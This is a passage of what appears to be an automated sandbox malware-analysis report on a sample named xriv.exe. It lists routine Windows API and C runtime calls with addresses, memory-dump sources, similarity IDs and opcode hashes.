                                                                        • GetLastError.KERNEL32(?,00000000,?,0121AD8D,00000000,?,?,?,0121AF26,?), ref: 0121DF49
                                                                        • _free.LIBCMT ref: 0121DFA6
                                                                        • _free.LIBCMT ref: 0121DFDC
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0121AF26,?), ref: 0121DFE7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,?,0121B7F5,0121DB7F,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121E0A0
                                                                        • _free.LIBCMT ref: 0121E0FD
                                                                        • _free.LIBCMT ref: 0121E133
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121E13E
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0121E9E2,00000000,?,0122370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0121E893
                                                                        • GetLastError.KERNEL32(?,0122370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0121E9E2,00000000,00000104,?), ref: 0121E89D
                                                                        • __dosmaperr.LIBCMT ref: 0121E8A4
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0121E9E2,00000000,?,01223695,00000000,00000000,0121E9E2,?,?,00000000,00000000,00000001), ref: 0121E8FC
                                                                        • GetLastError.KERNEL32(?,01223695,00000000,00000000,0121E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0121E9E2,00000000,00000104), ref: 0121E906
                                                                        • __dosmaperr.LIBCMT ref: 0121E90D
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(01205140,0000000F,012368F8,00000000,01205140,?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140), ref: 012263A6
                                                                        • GetLastError.KERNEL32(?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140,00000000,01205140,?,01223421,01205140), ref: 012263B2
                                                                          • Part of subcall function 01226378: CloseHandle.KERNEL32(FFFFFFFE,012263C2,?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140,00000000,01205140), ref: 01226388
                                                                        • ___initconout.LIBCMT ref: 012263C2
                                                                          • Part of subcall function 0122633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01226369,01225A94,01205140,?,01222ECD,00000000,?,01205140,00000000), ref: 0122634D
                                                                        • WriteConsoleW.KERNEL32(01205140,0000000F,012368F8,00000000,?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140,00000000), ref: 012263D7
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,01217157,00000064), ref: 012171DD
                                                                        • LeaveCriticalSection.KERNEL32(01239708,000000FF,?,01217157,00000064,?,?,?,01203E30,0123C468,FDD920DC,?,00000000,01228818,000000FF), ref: 012171E7
                                                                        • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01217157,00000064,?,?,?,01203E30,0123C468,FDD920DC,?,00000000,01228818,000000FF), ref: 012171F8
                                                                        • EnterCriticalSection.KERNEL32(01239708,?,01217157,00000064,?,?,?,01203E30,0123C468,FDD920DC,?,00000000,01228818,000000FF), ref: 012171FF
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 0121C8C4
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 0121C8D7
                                                                        • _free.LIBCMT ref: 0121C8E8
                                                                        • _free.LIBCMT ref: 0121C8F9
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -
                                                                        • API String ID: 0-2547889144
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0120F054
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0120F51E
                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PathTempXinvalid_argumentstd::_
                                                                        • String ID: invalid stoi argument$stoi argument out of range
                                                                        • API String ID: 3948722134-1606216832
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01218FA2
                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 2118026453-2084237596
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01212093
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileModuleName
                                                                        • String ID: 5120$H
                                                                        • API String ID: 514040917-2391956277
                                                                        • Opcode ID: db8cd6a150de5f719789b4510e52280fd4e0811c950de64a7f4b4171afbd6630
                                                                        • Instruction ID: 453c1f61f7fa2765f3aff83276c4e54de9bc86dcbec6dab986dfdc9bbad9df9a
                                                                        • Opcode Fuzzy Hash: db8cd6a150de5f719789b4510e52280fd4e0811c950de64a7f4b4171afbd6630
                                                                        • Instruction Fuzzy Hash: B921ACB0910348ABDB24EF28C9467ED7FF5AB22304F5401CCD54967286D7754B488BA3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%